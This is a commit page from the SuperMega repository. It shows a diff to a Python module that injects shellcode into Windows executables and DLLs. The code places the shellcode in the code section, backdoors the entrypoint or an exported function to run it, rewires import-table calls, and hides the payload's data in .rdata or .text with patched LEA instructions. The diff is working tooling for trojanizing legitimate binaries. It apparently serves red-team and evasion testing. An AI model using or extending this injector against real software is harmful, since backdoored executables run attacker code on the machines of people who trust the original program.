admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: datareuse now supports multiple references -> fix change_ carriers

Browse Source
This commit is contained in:
Dobin Rutishauser
2024-06-22 12:59:21 +02:00
parent ae3567847c
commit de77f50f06
7 changed files with 156 additions and 191 deletions
Download Patch File Download Diff File Expand all files Collapse all files
phases/injector.py
+84 -83
View File
@@ -4,7 +4,7 @@ import time
import logging
from typing import Dict, List
from model.carrier import Carrier, DataReuseEntry
from model.carrier import Carrier, DataReuseEntry, DataReuseReference
from pe.pehelper import *
from observer import observer
from pe.derbackdoorer import FunctionBackdoorer
@@ -18,7 +18,7 @@ from model.payload import Payload
logger = logging.getLogger("Injector")
def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier, payload: Payload):
def inject_exe(carrier_shc: bytes, settings: Settings, carrier: Carrier, payload: Payload):
exe_in = settings.inject_exe_in
exe_out = settings.inject_exe_out
carrier_invoke_style: CarrierInvokeStyle = settings.carrier_invoke_style
@@ -26,12 +26,12 @@ def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier, payload: P
logger.info("--[ Injecting: into {} -> {}".format(exe_in, exe_out))
# CHECK if shellcode fits into the target code section
shellcode_len = len(main_shc)
code_sect_size = carrier.superpe.get_code_section().Misc_VirtualSize
if shellcode_len + CODE_INJECT_SIZE_CHECK_ADD > code_sect_size:
raise Exception("Error: Shellcode size {}+{} too big for target code section {}".format(
shellcode_len, CODE_INJECT_SIZE_CHECK_ADD, code_sect_size
))
carrier_shc_len = len(carrier_shc)
#code_sect_size = carrier.superpe.get_code_section().Misc_VirtualSize
#if carrier_shc_len + CODE_INJECT_SIZE_CHECK_ADD > code_sect_size:
# raise Exception("Error: Shellcode size {}+{} too big for target code section {}".format(
# carrier_shc_len, CODE_INJECT_SIZE_CHECK_ADD, code_sect_size
# ))
# superpe is a representation of the exe file. We gonna modify it, and save it at the end.
superpe = SuperPe(exe_in)
@@ -57,7 +57,7 @@ def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier, payload: P
superpe.pe.parse_data_directories()
superpe.init_iat_entries()
shellcode_offset: int = 0 # file offset
carrier_shc_offset: int = 0 # file offset
# Special case: DLL exported function direct overwrite
if superpe.is_dll() and settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
@@ -66,15 +66,15 @@ def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier, payload: P
# Size and sanity checks
function_size = superpe.get_size_of_exported_function(settings.dllfunc)
if shellcode_len >= function_size:
if carrier_shc_len >= function_size:
logger.warning("Shellcode larger than function: {} > {} exported function {}".format(
shellcode_len, function_size, settings.dllfunc
carrier_shc_len, function_size, settings.dllfunc
))
# Inject
shellcode_offset = superpe.get_offset_from_rva(rva)
logger.info(f'----[ Using DLL Export "{settings.dllfunc}" at RVA 0x{rva:X} offset 0x{shellcode_offset:X} to overwrite')
superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc)
carrier_shc_offset = superpe.get_offset_from_rva(rva)
logger.info(f'----[ Using DLL Export "{settings.dllfunc}" at RVA 0x{rva:X} offset 0x{carrier_shc_offset:X} to overwrite')
superpe.pe.set_bytes_at_offset(carrier_shc_offset, carrier_shc)
else: # EXE/DLL
# Put it somewhere in the code section, and rewire the flow
@@ -82,26 +82,26 @@ def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier, payload: P
if sect == None:
raise Exception('Could not find code section in input PE file!')
sect_size = sect.Misc_VirtualSize # Better than: SizeOfRawData
if sect_size < shellcode_len + CODE_INJECT_SIZE_CHECK_ADD:
if sect_size < carrier_shc_len + CODE_INJECT_SIZE_CHECK_ADD:
raise Exception("Shellcode too large: {}+{} > {}".format(
shellcode_len, CODE_INJECT_SIZE_CHECK_ADD, sect_size
carrier_shc_len, CODE_INJECT_SIZE_CHECK_ADD, sect_size
))
shellcode_offset = int((sect_size - shellcode_len) / 2) # centered in the .text section
carrier_shc_offset = int((sect_size - carrier_shc_len) / 2) # centered in the .text section
#shellcode_offset = round_up_to_multiple_of_8(shellcode_offset)
shellcode_offset += sect.PointerToRawData
shellcode_rva = superpe.pe.get_rva_from_offset(shellcode_offset)
carrier_shc_offset += sect.PointerToRawData
shellcode_rva = superpe.pe.get_rva_from_offset(carrier_shc_offset)
# Aligning the payload (not carrier!) to page size is important for dll_loader_change
if settings.carrier_name == "dll_loader_change":
# align shellcode_rva minus an offset to page size
shellcode_rva = align_to_page_size(shellcode_rva, shellcode_len - len(payload.payload_data))
shellcode_offset = superpe.pe.get_offset_from_rva(shellcode_rva)
shellcode_rva = align_to_page_size(shellcode_rva, carrier_shc_len - len(payload.payload_data))
carrier_shc_offset = superpe.pe.get_offset_from_rva(shellcode_rva)
logger.info("---( Inject: Write Shellcode to offset:0x{:X} (rva:0x{:X})".format(
shellcode_offset, shellcode_rva))
carrier_shc_offset, shellcode_rva))
# Copy the shellcode
superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc)
superpe.pe.set_bytes_at_offset(carrier_shc_offset, carrier_shc)
# rewire flow
if superpe.is_dll() and settings.dllfunc != "": # DLL
@@ -113,7 +113,7 @@ def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier, payload: P
addr = superpe.getExportEntryPoint(settings.dllfunc)
logger.info("---( Inject DLL: Backdoor {} (0x{:X})".format(
settings.dllfunc, addr))
function_backdoorer.backdoor_function(addr, shellcode_rva, shellcode_len)
function_backdoorer.backdoor_function(addr, shellcode_rva, carrier_shc_len)
else: # EXE
if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
@@ -125,12 +125,13 @@ def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier, payload: P
addr = superpe.get_entrypoint()
logger.info("---( Inject EXE: Backdoor function at entrypoint (0x{:X})".format(
addr))
function_backdoorer.backdoor_function(addr, shellcode_rva, shellcode_len)
function_backdoorer.backdoor_function(addr, shellcode_rva, carrier_shc_len)
logger.info("--( Fix shellcode to re-use IAT entries")
injected_fix_iat(superpe, carrier)
logger.info("--( Fix shellcode to reference data stored in .rdata")
injected_fix_data(superpe, carrier)
injected_fix_data(superpe, carrier,
carrier_shc_offset + carrier_shc_len)
# changes from console to UI (no console window) if necessary
superpe.patch_subsystem()
@@ -141,7 +142,7 @@ def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier, payload: P
# Log
code = file_readall_binary(exe_out)
in_code = code[shellcode_offset:shellcode_offset+shellcode_len]
in_code = code[carrier_shc_offset:carrier_shc_offset+carrier_shc_len]
observer.add_code_file("carrier_exe", in_code)
@@ -164,81 +165,81 @@ def injected_fix_iat(superpe: SuperPe, carrier: Carrier):
))
jmp = assemble_relative_call(instruction_virtual_address, destination_virtual_address)
if len(jmp) != len(iatRequest.placeholder):
raise Exception("IatResolve: Call to IAT has different length than placeholder, abort")
raise Exception("IatResolve: Call to IAT has different length than placeholder: {} != {} abort".format(
len(jmp), len(iatRequest.placeholder)
))
code = code.replace(iatRequest.placeholder, jmp)
superpe.write_code_section_data(code)
def injected_fix_data(superpe: SuperPe, carrier: Carrier):
"""Inject shellcode-data into .rdata and replace reusedata_fixup placeholders in code with LEA"""
# Insert my data into the .rdata section.
# Chose and save each datareuse_fixup's addres.
def injected_fix_data(superpe: SuperPe, carrier: Carrier, shellcode_offset: int):
"""Inject data into .rdata/.text and replace reusedata_fixup placeholders in code with LEA"""
reusedata_fixups: List[DataReuseEntry] = carrier.get_all_reusedata_fixups()
if len(reusedata_fixups) == 0:
# nothing todo
return
# Put stuff into .rdata section in the PE
peSection = carrier.superpe.get_section_by_name(".rdata")
if peSection == None:
# .rdata storage manager
rdata_section = carrier.superpe.get_section_by_name(".rdata")
if rdata_section == None:
raise Exception("No .rdata section found, abort")
rm = carrier.superpe.get_rdata_relocmanager()
if True: # FIXME this is a hack which is sometimes necessary
sect_data_copy = peSection.pefile_section.get_data()
string_off = find_first_utf16_string_offset(sect_data_copy)
if string_off == None:
raise Exception("Strings not found in .rdata section, abort")
if string_off < 128:
logging.debug("weird: Strings in .rdata section at offset {} < 100".format(string_off))
string_off = 128
rm.add_range(peSection.virt_addr, peSection.virt_addr + string_off)
# Do all .rdata patches
logger.info("---( Patch: .rdata")
# insert data
logger.info("---( DataReuseFixups: Inject the data")
for datareuse_fixup in reusedata_fixups:
logger.info(" Handling DataReuse Fixup: {} <- {}".format(
datareuse_fixup.string_ref, datareuse_fixup.randbytes.hex()))
logger.debug(" Handling DataReuse Fixup: {} (.code: {})".format(
datareuse_fixup.string_ref, datareuse_fixup.in_code))
# get a hole in the .rdata section to put our data
hole_rva = rm.find_hole(len(datareuse_fixup.data))
if hole_rva == None:
raise Exception("No suitable hole with size {} found in .rdata section, abort".format(
len(datareuse_fixup.data)
))
rm.add_range(hole_rva[0], hole_rva[1]+1) # mark it as used
if datareuse_fixup.in_code: # .text
superpe.pe.set_bytes_at_offset(shellcode_offset, datareuse_fixup.data)
payload_rva = superpe.pe.get_rva_from_offset(shellcode_offset)
datareuse_fixup.addr = payload_rva + carrier.superpe.get_image_base()
logging.info(" Add to .text at 0x{:X} ({}): {} with size {}".format(
datareuse_fixup.addr, payload_rva, datareuse_fixup.string_ref, len(datareuse_fixup.data)))
var_data = datareuse_fixup.data
data_rva = hole_rva[0]
superpe.pe.set_bytes_at_rva(data_rva, var_data)
datareuse_fixup.addr = data_rva + carrier.superpe.get_image_base()
logging.info(" Add to .rdata at 0x{:X} ({}): {}: {}".format(
datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, ui_string_decode(var_data)))
else: # .rdata
# get a hole in the .rdata section to put our data
hole_rva = rm.find_hole(len(datareuse_fixup.data))
if hole_rva == None:
raise Exception("No suitable hole with size {} found in .rdata section, abort".format(
len(datareuse_fixup.data)
))
rm.add_range(hole_rva[0], hole_rva[1]+1) # mark it as used
# patch code section
# replace the placeholder with a LEA instruction to the data we written above
logger.info("---( Patch: .text")
var_data = datareuse_fixup.data
data_rva = hole_rva[0]
superpe.pe.set_bytes_at_rva(data_rva, var_data)
datareuse_fixup.addr = data_rva + carrier.superpe.get_image_base()
logging.info(" Add to .rdata at 0x{:X} ({}): {}: {}".format(
datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, ui_string_decode(var_data)))
# replace the placeholder in .text with a LEA instruction to the data we written above
logger.info("---( Datareusefixups: patch code to reference the data")
code = superpe.get_code_section_data()
for datareuse_fixup in reusedata_fixups:
if not datareuse_fixup.randbytes in code:
raise Exception("fix data in injectable: DataReuse: ID {} ({}) not found in code section, abort".format(
datareuse_fixup.randbytes.hex(), datareuse_fixup.string_ref))
offset_from_datasection = code.index(datareuse_fixup.randbytes)
instruction_virtual_address = offset_from_datasection + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress
destination_virtual_address = datareuse_fixup.addr
logger.info(" Replace bytes {} at VA 0x{:X} with: LEA {} .rdata 0x{:X}".format(
datareuse_fixup.randbytes.hex(), instruction_virtual_address, datareuse_fixup.register, destination_virtual_address
))
lea = assemble_lea(
instruction_virtual_address, destination_virtual_address, datareuse_fixup.register
)
asm_disasm(lea, instruction_virtual_address) # DEBUG
if len(lea) != len(datareuse_fixup.randbytes):
raise Exception("IatResolve: Call to IAT has different length than placeholder, abort")
code = code.replace(datareuse_fixup.randbytes, lea)
ref: DataReuseReference
for ref in datareuse_fixup.references:
if not ref.randbytes in code:
raise Exception("fix data in injectable: DataReuse: ID {} ({}) not found in code section, abort".format(
ref.randbytes.hex(), datareuse_fixup.string_ref))
offset_from_datasection = code.index(ref.randbytes)
instruction_virtual_address = offset_from_datasection + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress
destination_virtual_address = datareuse_fixup.addr
logger.info(" Replace bytes {} at VA 0x{:X} with: LEA {} .rdata 0x{:X}".format(
ref.randbytes.hex(), instruction_virtual_address, ref.register, destination_virtual_address
))
lea = assemble_lea(
instruction_virtual_address, destination_virtual_address, ref.register
)
asm_disasm(lea, instruction_virtual_address) # DEBUG
if len(lea) != len(ref.randbytes):
raise Exception("DataReuseFixup: lea instr has different length than placeholder: {} != {} abort".format(
len(lea), len(ref.randbytes)
))
code = code.replace(ref.randbytes, lea)
superpe.write_code_section_data(code)